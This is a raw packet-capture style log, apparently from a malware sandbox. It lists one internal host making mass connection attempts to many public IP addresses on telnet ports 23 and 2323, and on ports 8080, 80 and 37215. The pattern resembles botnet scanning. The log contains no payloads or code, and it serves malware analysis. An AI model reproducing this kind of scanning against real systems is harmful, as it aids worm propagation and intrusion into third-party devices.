Nov 22, 2023 08:37:50.440004110 CET	54320	23	192.168.2.23	88.76.88.55
Nov 22, 2023 08:37:50.440007925 CET	54320	23	192.168.2.23	67.67.98.232
Nov 22, 2023 08:37:50.440011024 CET	54320	23	192.168.2.23	107.152.71.136
Nov 22, 2023 08:37:50.440026999 CET	54320	23	192.168.2.23	222.169.102.44
Nov 22, 2023 08:37:50.440027952 CET	54320	23	192.168.2.23	189.59.234.164
Nov 22, 2023 08:37:50.440031052 CET	54320	23	192.168.2.23	58.171.126.121
Nov 22, 2023 08:37:50.440036058 CET	54320	23	192.168.2.23	50.112.77.79
Nov 22, 2023 08:37:50.440045118 CET	54320	23	192.168.2.23	155.48.136.9
Nov 22, 2023 08:37:50.440046072 CET	54320	23	192.168.2.23	155.109.7.235
Nov 22, 2023 08:37:50.440047026 CET	54320	2323	192.168.2.23	74.42.172.108
Nov 22, 2023 08:37:50.440052032 CET	54320	23	192.168.2.23	99.93.189.185
Nov 22, 2023 08:37:50.440063953 CET	54320	23	192.168.2.23	195.112.132.213
Nov 22, 2023 08:37:50.440066099 CET	54320	23	192.168.2.23	178.205.177.136
Nov 22, 2023 08:37:50.440072060 CET	54320	23	192.168.2.23	204.108.186.188
Nov 22, 2023 08:37:50.440083027 CET	54320	23	192.168.2.23	168.172.134.199
Nov 22, 2023 08:37:50.440094948 CET	54320	23	192.168.2.23	120.51.56.146
Nov 22, 2023 08:37:50.440094948 CET	54320	23	192.168.2.23	150.169.35.26
Nov 22, 2023 08:37:50.440103054 CET	54320	23	192.168.2.23	31.154.254.64
Nov 22, 2023 08:37:50.440103054 CET	54320	23	192.168.2.23	112.1.199.177
Nov 22, 2023 08:37:50.440103054 CET	54320	2323	192.168.2.23	199.26.177.216
Nov 22, 2023 08:37:50.440114975 CET	54320	23	192.168.2.23	201.224.181.84
Nov 22, 2023 08:37:50.440116882 CET	54320	23	192.168.2.23	12.118.184.47
Nov 22, 2023 08:37:50.440124989 CET	54320	23	192.168.2.23	212.141.70.132
Nov 22, 2023 08:37:50.440134048 CET	54320	23	192.168.2.23	49.57.186.63
Nov 22, 2023 08:37:50.440136909 CET	54320	23	192.168.2.23	221.225.100.6
Nov 22, 2023 08:37:50.440150023 CET	54320	23	192.168.2.23	114.174.111.202
Nov 22, 2023 08:37:50.440150976 CET	54320	23	192.168.2.23	80.134.30.186
Nov 22, 2023 08:37:50.440157890 CET	54320	23	192.168.2.23	152.11.179.186
Nov 22, 2023 08:37:50.440160990 CET	54320	23	192.168.2.23	60.67.7.192
Nov 22, 2023 08:37:50.440170050 CET	54320	2323	192.168.2.23	63.88.88.139
Nov 22, 2023 08:37:50.440172911 CET	54320	23	192.168.2.23	111.164.34.249
Nov 22, 2023 08:37:50.440172911 CET	54320	23	192.168.2.23	103.171.115.146
Nov 22, 2023 08:37:50.440186024 CET	54320	23	192.168.2.23	95.173.204.97
Nov 22, 2023 08:37:50.440190077 CET	54320	23	192.168.2.23	23.220.11.76
Nov 22, 2023 08:37:50.440201044 CET	54320	23	192.168.2.23	82.108.3.213
Nov 22, 2023 08:37:50.440202951 CET	54320	23	192.168.2.23	142.155.221.58
Nov 22, 2023 08:37:50.440207005 CET	54320	23	192.168.2.23	5.2.219.42
Nov 22, 2023 08:37:50.440221071 CET	54320	23	192.168.2.23	24.82.17.152
Nov 22, 2023 08:37:50.440223932 CET	54320	23	192.168.2.23	113.91.7.196
Nov 22, 2023 08:37:50.440227985 CET	54320	2323	192.168.2.23	138.11.106.77
Nov 22, 2023 08:37:50.440239906 CET	54320	23	192.168.2.23	166.178.81.112
Nov 22, 2023 08:37:50.440248013 CET	54320	23	192.168.2.23	157.64.139.250
Nov 22, 2023 08:37:50.440252066 CET	54320	23	192.168.2.23	48.51.127.242
Nov 22, 2023 08:37:50.440254927 CET	54320	23	192.168.2.23	156.92.238.214
Nov 22, 2023 08:37:50.440267086 CET	54320	23	192.168.2.23	8.81.107.110
Nov 22, 2023 08:37:50.440267086 CET	54320	23	192.168.2.23	98.165.21.24
Nov 22, 2023 08:37:50.440269947 CET	54320	23	192.168.2.23	34.74.80.121
Nov 22, 2023 08:37:50.440269947 CET	54320	23	192.168.2.23	19.252.34.168
Nov 22, 2023 08:37:50.440284014 CET	54320	23	192.168.2.23	177.169.144.218
Nov 22, 2023 08:37:50.440284967 CET	54320	2323	192.168.2.23	74.95.234.107
Nov 22, 2023 08:37:50.440284967 CET	54320	23	192.168.2.23	149.3.13.156
Nov 22, 2023 08:37:50.440299988 CET	54320	23	192.168.2.23	110.135.187.237
Nov 22, 2023 08:37:50.440303087 CET	54320	23	192.168.2.23	83.207.245.247
Nov 22, 2023 08:37:50.440304995 CET	54320	23	192.168.2.23	75.78.197.196
Nov 22, 2023 08:37:50.440315962 CET	54320	23	192.168.2.23	52.14.226.167
Nov 22, 2023 08:37:50.440321922 CET	54320	23	192.168.2.23	110.227.121.247
Nov 22, 2023 08:37:50.440334082 CET	54320	23	192.168.2.23	179.230.133.24
Nov 22, 2023 08:37:50.440344095 CET	54320	23	192.168.2.23	86.113.44.180
Nov 22, 2023 08:37:50.440345049 CET	54320	23	192.168.2.23	78.90.221.34
Nov 22, 2023 08:37:50.440356016 CET	54320	2323	192.168.2.23	93.124.107.205
Nov 22, 2023 08:37:50.440356016 CET	54320	23	192.168.2.23	171.234.146.14
Nov 22, 2023 08:37:50.440371037 CET	54320	23	192.168.2.23	135.76.10.158
Nov 22, 2023 08:37:50.440371037 CET	54320	23	192.168.2.23	60.122.13.7
Nov 22, 2023 08:37:50.440390110 CET	54320	23	192.168.2.23	129.97.46.64
Nov 22, 2023 08:37:50.440396070 CET	54320	23	192.168.2.23	209.148.234.205
Nov 22, 2023 08:37:50.440396070 CET	54320	23	192.168.2.23	4.119.229.78
Nov 22, 2023 08:37:50.440412045 CET	54320	23	192.168.2.23	80.103.47.160
Nov 22, 2023 08:37:50.440413952 CET	54320	23	192.168.2.23	100.187.165.25
Nov 22, 2023 08:37:50.440419912 CET	54320	23	192.168.2.23	67.11.252.42
Nov 22, 2023 08:37:50.440434933 CET	54320	2323	192.168.2.23	185.10.79.143
Nov 22, 2023 08:37:50.440435886 CET	54320	23	192.168.2.23	129.200.73.35
Nov 22, 2023 08:37:50.440438986 CET	54320	23	192.168.2.23	158.14.244.64
Nov 22, 2023 08:37:50.440455914 CET	54320	23	192.168.2.23	190.49.116.239
Nov 22, 2023 08:37:50.440457106 CET	54320	23	192.168.2.23	4.169.116.118
Nov 22, 2023 08:37:50.440459967 CET	54320	23	192.168.2.23	104.224.151.29
Nov 22, 2023 08:37:50.440464020 CET	54320	23	192.168.2.23	183.159.113.254
Nov 22, 2023 08:37:50.440469980 CET	54320	23	192.168.2.23	32.220.159.213
Nov 22, 2023 08:37:50.440478086 CET	54320	23	192.168.2.23	65.165.73.180
Nov 22, 2023 08:37:50.440488100 CET	54320	2323	192.168.2.23	212.133.52.31
Nov 22, 2023 08:37:50.440488100 CET	54320	23	192.168.2.23	161.126.185.51
Nov 22, 2023 08:37:50.440496922 CET	54320	23	192.168.2.23	123.148.106.152
Nov 22, 2023 08:37:50.440507889 CET	54320	23	192.168.2.23	200.151.78.183
Nov 22, 2023 08:37:50.440510035 CET	54320	23	192.168.2.23	211.124.193.252
Nov 22, 2023 08:37:50.440526009 CET	54320	23	192.168.2.23	167.178.5.17
Nov 22, 2023 08:37:50.440526962 CET	54320	23	192.168.2.23	105.94.77.20
Nov 22, 2023 08:37:50.440526962 CET	54320	23	192.168.2.23	164.176.184.12
Nov 22, 2023 08:37:50.440541029 CET	54320	23	192.168.2.23	64.33.230.125
Nov 22, 2023 08:37:50.440542936 CET	54320	23	192.168.2.23	25.224.108.6
Nov 22, 2023 08:37:50.440543890 CET	54320	23	192.168.2.23	12.125.63.87
Nov 22, 2023 08:37:50.440562010 CET	54320	23	192.168.2.23	124.74.222.208
Nov 22, 2023 08:37:50.440562010 CET	54320	2323	192.168.2.23	164.190.245.65
Nov 22, 2023 08:37:50.440565109 CET	54320	23	192.168.2.23	117.226.236.54
Nov 22, 2023 08:37:50.440565109 CET	54320	23	192.168.2.23	8.82.20.50
Nov 22, 2023 08:37:50.440567017 CET	54320	23	192.168.2.23	158.143.57.155
Nov 22, 2023 08:37:50.440576077 CET	54320	23	192.168.2.23	202.2.81.107
Nov 22, 2023 08:37:50.440582991 CET	54320	23	192.168.2.23	45.139.99.171
Nov 22, 2023 08:37:50.440589905 CET	54320	23	192.168.2.23	211.142.14.224
Nov 22, 2023 08:37:50.440596104 CET	54320	23	192.168.2.23	137.129.38.203
Nov 22, 2023 08:37:50.440608025 CET	54320	23	192.168.2.23	75.59.39.43
Nov 22, 2023 08:37:50.440608025 CET	54320	2323	192.168.2.23	216.14.193.242
Nov 22, 2023 08:37:50.440615892 CET	54320	23	192.168.2.23	218.174.19.5
Nov 22, 2023 08:37:50.440624952 CET	54320	23	192.168.2.23	145.139.129.85
Nov 22, 2023 08:37:50.440632105 CET	54320	23	192.168.2.23	177.184.230.59
Nov 22, 2023 08:37:50.517340899 CET	8080	54329	85.153.84.22	192.168.2.23
Nov 22, 2023 08:37:50.524108887 CET	8080	54329	62.216.66.9	192.168.2.23
Nov 22, 2023 08:37:50.524199009 CET	8080	54329	31.220.99.243	192.168.2.23
Nov 22, 2023 08:37:50.554183960 CET	23	54320	66.85.6.74	192.168.2.23
Nov 22, 2023 08:37:50.568036079 CET	2323	54320	74.117.244.98	192.168.2.23
Nov 22, 2023 08:37:50.587903976 CET	8080	54329	62.129.4.4	192.168.2.23
Nov 22, 2023 08:37:50.590236902 CET	8080	54329	94.238.153.128	192.168.2.23
Nov 22, 2023 08:37:50.590403080 CET	54329	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:50.593713999 CET	8080	54329	85.116.18.200	192.168.2.23
Nov 22, 2023 08:37:50.594840050 CET	23	54320	187.188.99.1	192.168.2.23
Nov 22, 2023 08:37:50.597162962 CET	8080	54329	85.122.194.92	192.168.2.23
Nov 22, 2023 08:37:50.600294113 CET	8080	54329	94.103.121.193	192.168.2.23
Nov 22, 2023 08:37:50.602731943 CET	8080	54329	94.237.25.41	192.168.2.23
Nov 22, 2023 08:37:50.605504036 CET	8080	54329	95.250.171.3	192.168.2.23
Nov 22, 2023 08:37:50.608431101 CET	8080	54329	31.136.70.145	192.168.2.23
Nov 22, 2023 08:37:50.608500004 CET	54329	8080	192.168.2.23	31.136.70.145
Nov 22, 2023 08:37:50.609752893 CET	8080	54329	85.32.226.102	192.168.2.23
Nov 22, 2023 08:37:50.610095978 CET	8080	54329	62.26.229.77	192.168.2.23
Nov 22, 2023 08:37:50.615797997 CET	8080	54329	85.125.172.32	192.168.2.23
Nov 22, 2023 08:37:50.619491100 CET	80	48460	95.110.132.243	192.168.2.23
Nov 22, 2023 08:37:50.619556904 CET	48460	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.619829893 CET	48460	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.619869947 CET	48460	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.619956970 CET	48462	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.621742010 CET	8080	54329	95.233.112.131	192.168.2.23
Nov 22, 2023 08:37:50.622808933 CET	80	52566	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:50.622858047 CET	52566	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.622884035 CET	52566	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.622884035 CET	52566	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.623003960 CET	52574	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.623029947 CET	8080	54329	94.53.26.70	192.168.2.23
Nov 22, 2023 08:37:50.627213001 CET	37215	54335	157.97.84.128	192.168.2.23
Nov 22, 2023 08:37:50.628303051 CET	8080	54329	94.19.17.21	192.168.2.23
Nov 22, 2023 08:37:50.629059076 CET	8080	54329	85.113.182.182	192.168.2.23
Nov 22, 2023 08:37:50.636256933 CET	8080	54329	95.227.164.156	192.168.2.23
Nov 22, 2023 08:37:50.637547970 CET	8080	54329	31.202.113.161	192.168.2.23
Nov 22, 2023 08:37:50.640588999 CET	8080	54329	31.200.127.109	192.168.2.23
Nov 22, 2023 08:37:50.640640020 CET	54329	8080	192.168.2.23	31.200.127.109
Nov 22, 2023 08:37:50.644279003 CET	80	49470	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:50.644330025 CET	49470	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:50.644356012 CET	49470	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:50.644362926 CET	49470	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:50.644387960 CET	49478	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:50.647310019 CET	80	54328	88.24.31.244	192.168.2.23
Nov 22, 2023 08:37:50.650083065 CET	8080	54329	62.38.111.94	192.168.2.23
Nov 22, 2023 08:37:50.650094986 CET	8080	54329	95.130.171.27	192.168.2.23
Nov 22, 2023 08:37:50.653631926 CET	8080	54329	94.121.79.125	192.168.2.23
Nov 22, 2023 08:37:50.653770924 CET	54329	8080	192.168.2.23	94.121.79.125
Nov 22, 2023 08:37:50.659989119 CET	8080	54329	31.146.21.106	192.168.2.23
Nov 22, 2023 08:37:50.670351982 CET	8080	54329	95.80.93.219	192.168.2.23
Nov 22, 2023 08:37:50.671355009 CET	8080	54329	31.146.224.127	192.168.2.23
Nov 22, 2023 08:37:50.673151970 CET	8080	54329	94.229.69.222	192.168.2.23
Nov 22, 2023 08:37:50.675940990 CET	8080	54329	94.30.212.180	192.168.2.23
Nov 22, 2023 08:37:50.689763069 CET	8080	54329	85.207.96.78	192.168.2.23
Nov 22, 2023 08:37:50.692166090 CET	8080	54329	95.56.73.100	192.168.2.23
Nov 22, 2023 08:37:50.707130909 CET	23	54320	60.122.13.7	192.168.2.23
Nov 22, 2023 08:37:50.710334063 CET	8080	54329	94.243.62.137	192.168.2.23
Nov 22, 2023 08:37:50.721507072 CET	23	54320	211.124.193.252	192.168.2.23
Nov 22, 2023 08:37:50.732364893 CET	23	54320	110.135.187.237	192.168.2.23
Nov 22, 2023 08:37:50.746228933 CET	2323	54320	49.170.196.199	192.168.2.23
Nov 22, 2023 08:37:50.765175104 CET	23	54320	113.238.173.226	192.168.2.23
Nov 22, 2023 08:37:50.800142050 CET	23	54320	118.116.183.85	192.168.2.23
Nov 22, 2023 08:37:50.800764084 CET	8080	54329	94.44.179.141	192.168.2.23
Nov 22, 2023 08:37:50.801336050 CET	8080	54329	95.111.203.50	192.168.2.23
Nov 22, 2023 08:37:50.811537027 CET	80	48460	95.110.132.243	192.168.2.23
Nov 22, 2023 08:37:50.811918974 CET	80	48460	95.110.132.243	192.168.2.23
Nov 22, 2023 08:37:50.812009096 CET	48460	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.813998938 CET	80	48462	95.110.132.243	192.168.2.23
Nov 22, 2023 08:37:50.814059973 CET	48462	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.814137936 CET	48462	80	192.168.2.23	95.110.132.243
Nov 22, 2023 08:37:50.818003893 CET	80	52566	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:50.818017960 CET	80	52574	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:50.818161011 CET	52574	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.818162918 CET	80	52566	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:50.818161011 CET	52574	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.818176031 CET	80	52566	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:50.818222046 CET	52566	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.818222046 CET	52566	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:50.821957111 CET	80	54328	95.196.236.68	192.168.2.23
Nov 22, 2023 08:37:50.858239889 CET	80	49478	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:50.858315945 CET	49478	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:50.858315945 CET	49478	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:50.861283064 CET	80	49470	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:50.874304056 CET	23	54320	153.250.168.97	192.168.2.23
Nov 22, 2023 08:37:50.893312931 CET	80	49470	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:51.008404970 CET	80	48462	95.110.132.243	192.168.2.23
Nov 22, 2023 08:37:51.013125896 CET	80	52574	95.217.85.34	192.168.2.23
Nov 22, 2023 08:37:51.013209105 CET	52574	80	192.168.2.23	95.217.85.34
Nov 22, 2023 08:37:51.078567028 CET	80	49478	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:51.079487085 CET	8080	54329	95.35.28.177	192.168.2.23
Nov 22, 2023 08:37:51.111038923 CET	80	49478	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:51.111155033 CET	49478	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:51.115775108 CET	80	49470	95.107.233.10	192.168.2.23
Nov 22, 2023 08:37:51.115906000 CET	49470	80	192.168.2.23	95.107.233.10
Nov 22, 2023 08:37:51.420646906 CET	54329	8080	192.168.2.23	94.82.62.102
Nov 22, 2023 08:37:51.420649052 CET	54329	8080	192.168.2.23	62.31.206.189
Nov 22, 2023 08:37:51.420671940 CET	54329	8080	192.168.2.23	95.34.142.188
Nov 22, 2023 08:37:51.420672894 CET	54329	8080	192.168.2.23	95.251.172.73
Nov 22, 2023 08:37:51.420675039 CET	54329	8080	192.168.2.23	31.4.207.123
Nov 22, 2023 08:37:51.420675039 CET	54329	8080	192.168.2.23	95.191.112.205
Nov 22, 2023 08:37:51.420691013 CET	54329	8080	192.168.2.23	94.126.227.129
Nov 22, 2023 08:37:51.420691967 CET	54329	8080	192.168.2.23	94.6.10.59
Nov 22, 2023 08:37:51.420691967 CET	54329	8080	192.168.2.23	95.154.44.4
Nov 22, 2023 08:37:51.420692921 CET	54329	8080	192.168.2.23	62.42.167.64
Nov 22, 2023 08:37:51.420692921 CET	54329	8080	192.168.2.23	85.204.140.26
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	31.62.17.194
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	95.240.15.54
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	94.215.35.166
Nov 22, 2023 08:37:51.420701981 CET	54329	8080	192.168.2.23	31.75.99.103
Nov 22, 2023 08:37:51.420701981 CET	54329	8080	192.168.2.23	85.40.109.35
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	62.249.75.255
Nov 22, 2023 08:37:51.420705080 CET	54329	8080	192.168.2.23	31.22.223.57
Nov 22, 2023 08:37:51.420705080 CET	54329	8080	192.168.2.23	94.231.45.241
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	85.218.25.54
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	94.197.200.13
Nov 22, 2023 08:37:51.420696974 CET	54329	8080	192.168.2.23	94.79.139.125
Nov 22, 2023 08:37:51.420715094 CET	54329	8080	192.168.2.23	94.121.181.0
Nov 22, 2023 08:37:51.420716047 CET	54329	8080	192.168.2.23	62.158.106.94
Nov 22, 2023 08:37:51.420716047 CET	54329	8080	192.168.2.23	94.236.122.175
Nov 22, 2023 08:37:51.420721054 CET	54329	8080	192.168.2.23	62.227.202.74
Nov 22, 2023 08:37:51.420721054 CET	54329	8080	192.168.2.23	62.178.125.179
Nov 22, 2023 08:37:51.420723915 CET	54329	8080	192.168.2.23	94.33.137.132
Nov 22, 2023 08:37:51.420737028 CET	54329	8080	192.168.2.23	85.75.36.65
Nov 22, 2023 08:37:51.420741081 CET	54329	8080	192.168.2.23	85.39.182.134
Nov 22, 2023 08:37:51.420741081 CET	54329	8080	192.168.2.23	95.160.158.242
Nov 22, 2023 08:37:51.420741081 CET	54329	8080	192.168.2.23	85.110.242.168
Nov 22, 2023 08:37:51.420753956 CET	54329	8080	192.168.2.23	85.171.96.225
Nov 22, 2023 08:37:51.420763016 CET	54329	8080	192.168.2.23	62.26.137.27
Nov 22, 2023 08:37:51.420772076 CET	54329	8080	192.168.2.23	62.96.59.56
Nov 22, 2023 08:37:51.420770884 CET	54329	8080	192.168.2.23	95.157.181.10
Nov 22, 2023 08:37:51.420770884 CET	54329	8080	192.168.2.23	31.209.21.107
Nov 22, 2023 08:37:51.420770884 CET	54329	8080	192.168.2.23	85.12.236.90
Nov 22, 2023 08:37:51.420790911 CET	54329	8080	192.168.2.23	31.89.55.8
Nov 22, 2023 08:37:51.420798063 CET	54329	8080	192.168.2.23	85.125.156.228
Nov 22, 2023 08:37:51.420806885 CET	54329	8080	192.168.2.23	95.244.78.175
Nov 22, 2023 08:37:51.420806885 CET	54329	8080	192.168.2.23	94.158.76.101
Nov 22, 2023 08:37:51.420808077 CET	54329	8080	192.168.2.23	31.162.243.106
Nov 22, 2023 08:37:51.420809031 CET	54329	8080	192.168.2.23	62.164.163.47
Nov 22, 2023 08:37:51.420811892 CET	54329	8080	192.168.2.23	31.9.177.230
Nov 22, 2023 08:37:51.420820951 CET	54329	8080	192.168.2.23	85.229.73.208
Nov 22, 2023 08:37:51.420824051 CET	54329	8080	192.168.2.23	62.235.96.112
Nov 22, 2023 08:37:51.420824051 CET	54329	8080	192.168.2.23	85.191.219.170
Nov 22, 2023 08:37:51.420833111 CET	54329	8080	192.168.2.23	62.130.130.65
Nov 22, 2023 08:37:51.420833111 CET	54329	8080	192.168.2.23	94.175.45.186
Nov 22, 2023 08:37:51.420833111 CET	54329	8080	192.168.2.23	85.197.63.8
Nov 22, 2023 08:37:51.420833111 CET	54329	8080	192.168.2.23	95.3.85.239
Nov 22, 2023 08:37:51.420833111 CET	54329	8080	192.168.2.23	94.73.169.118
Nov 22, 2023 08:37:51.420840979 CET	54329	8080	192.168.2.23	95.212.92.60
Nov 22, 2023 08:37:51.420850039 CET	54329	8080	192.168.2.23	85.217.154.221
Nov 22, 2023 08:37:51.420861959 CET	54329	8080	192.168.2.23	62.198.8.180
Nov 22, 2023 08:37:51.420862913 CET	54329	8080	192.168.2.23	95.135.68.85
Nov 22, 2023 08:37:51.420869112 CET	54329	8080	192.168.2.23	94.179.230.209
Nov 22, 2023 08:37:51.420872927 CET	54329	8080	192.168.2.23	85.134.120.60
Nov 22, 2023 08:37:51.420880079 CET	54329	8080	192.168.2.23	31.75.174.12
Nov 22, 2023 08:37:51.420900106 CET	54329	8080	192.168.2.23	95.74.53.71
Nov 22, 2023 08:37:51.420900106 CET	54329	8080	192.168.2.23	94.58.28.66
Nov 22, 2023 08:37:51.420903921 CET	54329	8080	192.168.2.23	31.174.191.172
Nov 22, 2023 08:37:51.420912981 CET	54329	8080	192.168.2.23	94.165.122.184
Nov 22, 2023 08:37:51.420928001 CET	54329	8080	192.168.2.23	95.50.121.20
Nov 22, 2023 08:37:51.420931101 CET	54329	8080	192.168.2.23	31.29.96.72
Nov 22, 2023 08:37:51.420939922 CET	54329	8080	192.168.2.23	95.252.117.5
Nov 22, 2023 08:37:51.420952082 CET	54329	8080	192.168.2.23	95.189.144.152
Nov 22, 2023 08:37:51.420952082 CET	54329	8080	192.168.2.23	95.111.174.144
Nov 22, 2023 08:37:51.420953989 CET	54329	8080	192.168.2.23	94.159.189.181
Nov 22, 2023 08:37:51.420954943 CET	54329	8080	192.168.2.23	94.167.1.202
Nov 22, 2023 08:37:51.420960903 CET	54329	8080	192.168.2.23	31.228.133.62
Nov 22, 2023 08:37:51.420962095 CET	54329	8080	192.168.2.23	94.228.17.33
Nov 22, 2023 08:37:51.420962095 CET	54329	8080	192.168.2.23	31.18.214.179
Nov 22, 2023 08:37:51.420981884 CET	54329	8080	192.168.2.23	94.111.36.49
Nov 22, 2023 08:37:51.420983076 CET	54329	8080	192.168.2.23	31.192.100.246
Nov 22, 2023 08:37:51.420990944 CET	54329	8080	192.168.2.23	31.59.220.75
Nov 22, 2023 08:37:51.421003103 CET	54329	8080	192.168.2.23	62.140.30.31
Nov 22, 2023 08:37:51.421006918 CET	54329	8080	192.168.2.23	85.86.98.125
Nov 22, 2023 08:37:51.421010017 CET	54329	8080	192.168.2.23	31.112.7.85
Nov 22, 2023 08:37:51.421019077 CET	54329	8080	192.168.2.23	95.95.243.78
Nov 22, 2023 08:37:51.421022892 CET	54329	8080	192.168.2.23	85.3.25.4
Nov 22, 2023 08:37:51.421025991 CET	54329	8080	192.168.2.23	62.112.42.161
Nov 22, 2023 08:37:51.421041012 CET	54329	8080	192.168.2.23	85.70.66.139
Nov 22, 2023 08:37:51.421049118 CET	54329	8080	192.168.2.23	85.63.154.62
Nov 22, 2023 08:37:51.421051979 CET	54329	8080	192.168.2.23	31.118.57.204
Nov 22, 2023 08:37:51.421051979 CET	54329	8080	192.168.2.23	95.34.240.23
Nov 22, 2023 08:37:51.421051979 CET	54329	8080	192.168.2.23	31.133.170.200
Nov 22, 2023 08:37:51.421063900 CET	54329	8080	192.168.2.23	95.231.100.237
Nov 22, 2023 08:37:51.421073914 CET	54329	8080	192.168.2.23	31.155.161.227
Nov 22, 2023 08:37:51.421077967 CET	54329	8080	192.168.2.23	62.228.61.225
Nov 22, 2023 08:37:51.421082020 CET	54329	8080	192.168.2.23	94.193.104.230
Nov 22, 2023 08:37:51.421089888 CET	54329	8080	192.168.2.23	95.108.34.144
Nov 22, 2023 08:37:51.421089888 CET	54329	8080	192.168.2.23	62.115.243.177
Nov 22, 2023 08:37:51.421094894 CET	54329	8080	192.168.2.23	85.19.86.169
Nov 22, 2023 08:37:51.421094894 CET	54329	8080	192.168.2.23	94.248.210.191
Nov 22, 2023 08:37:51.421097040 CET	54329	8080	192.168.2.23	85.120.221.110
Nov 22, 2023 08:37:51.421094894 CET	54329	8080	192.168.2.23	85.9.66.46
Nov 22, 2023 08:37:51.421103001 CET	54329	8080	192.168.2.23	62.152.152.23
Nov 22, 2023 08:37:51.421125889 CET	54329	8080	192.168.2.23	62.44.25.139
Nov 22, 2023 08:37:51.421125889 CET	54329	8080	192.168.2.23	94.57.79.10
Nov 22, 2023 08:37:51.421135902 CET	54329	8080	192.168.2.23	85.184.116.84
Nov 22, 2023 08:37:51.421143055 CET	54329	8080	192.168.2.23	31.226.115.127
Nov 22, 2023 08:37:51.421143055 CET	54329	8080	192.168.2.23	95.4.7.152
Nov 22, 2023 08:37:51.421149969 CET	54329	8080	192.168.2.23	62.39.239.212
Nov 22, 2023 08:37:51.421152115 CET	54329	8080	192.168.2.23	94.66.73.229
Nov 22, 2023 08:37:51.421153069 CET	54329	8080	192.168.2.23	95.92.112.93
Nov 22, 2023 08:37:51.421153069 CET	54329	8080	192.168.2.23	31.17.68.9
Nov 22, 2023 08:37:51.421173096 CET	54329	8080	192.168.2.23	94.190.208.234
Nov 22, 2023 08:37:51.421181917 CET	54329	8080	192.168.2.23	31.210.41.196
Nov 22, 2023 08:37:51.421183109 CET	54329	8080	192.168.2.23	31.164.230.108
Nov 22, 2023 08:37:51.421199083 CET	54329	8080	192.168.2.23	85.248.193.76
Nov 22, 2023 08:37:51.421200991 CET	54329	8080	192.168.2.23	31.240.67.78
Nov 22, 2023 08:37:51.421202898 CET	54329	8080	192.168.2.23	62.100.140.23
Nov 22, 2023 08:37:51.421214104 CET	54329	8080	192.168.2.23	95.253.246.45
Nov 22, 2023 08:37:51.421226978 CET	54329	8080	192.168.2.23	62.37.10.51
Nov 22, 2023 08:37:51.421226978 CET	54329	8080	192.168.2.23	95.33.189.207
Nov 22, 2023 08:37:51.421247005 CET	54329	8080	192.168.2.23	95.23.66.86
Nov 22, 2023 08:37:51.421247005 CET	54329	8080	192.168.2.23	62.180.166.106
Nov 22, 2023 08:37:51.421261072 CET	54329	8080	192.168.2.23	31.91.82.212
Nov 22, 2023 08:37:51.421261072 CET	54329	8080	192.168.2.23	85.57.252.246
Nov 22, 2023 08:37:51.421272039 CET	54329	8080	192.168.2.23	31.20.130.128
Nov 22, 2023 08:37:51.421273947 CET	54329	8080	192.168.2.23	62.84.181.72
Nov 22, 2023 08:37:51.421273947 CET	54329	8080	192.168.2.23	85.129.123.121
Nov 22, 2023 08:37:51.421274900 CET	54329	8080	192.168.2.23	95.81.17.28
Nov 22, 2023 08:37:51.421278954 CET	54329	8080	192.168.2.23	62.2.128.29
Nov 22, 2023 08:37:51.421281099 CET	54329	8080	192.168.2.23	94.215.245.3
Nov 22, 2023 08:37:51.421281099 CET	54329	8080	192.168.2.23	62.99.223.20
Nov 22, 2023 08:37:51.421287060 CET	54329	8080	192.168.2.23	85.200.148.247
Nov 22, 2023 08:37:51.421287060 CET	54329	8080	192.168.2.23	31.232.122.220
Nov 22, 2023 08:37:51.421294928 CET	54329	8080	192.168.2.23	95.56.241.162
Nov 22, 2023 08:37:51.421319962 CET	54329	8080	192.168.2.23	85.73.16.204
Nov 22, 2023 08:37:51.421320915 CET	54329	8080	192.168.2.23	85.238.132.28
Nov 22, 2023 08:37:51.421323061 CET	54329	8080	192.168.2.23	94.173.60.85
Nov 22, 2023 08:37:51.421324015 CET	54329	8080	192.168.2.23	94.163.178.74
Nov 22, 2023 08:37:51.421324015 CET	54329	8080	192.168.2.23	85.23.230.150
Nov 22, 2023 08:37:51.421324015 CET	54329	8080	192.168.2.23	85.69.92.188
Nov 22, 2023 08:37:51.421329021 CET	54329	8080	192.168.2.23	85.219.50.196
Nov 22, 2023 08:37:51.421333075 CET	54329	8080	192.168.2.23	62.157.30.131
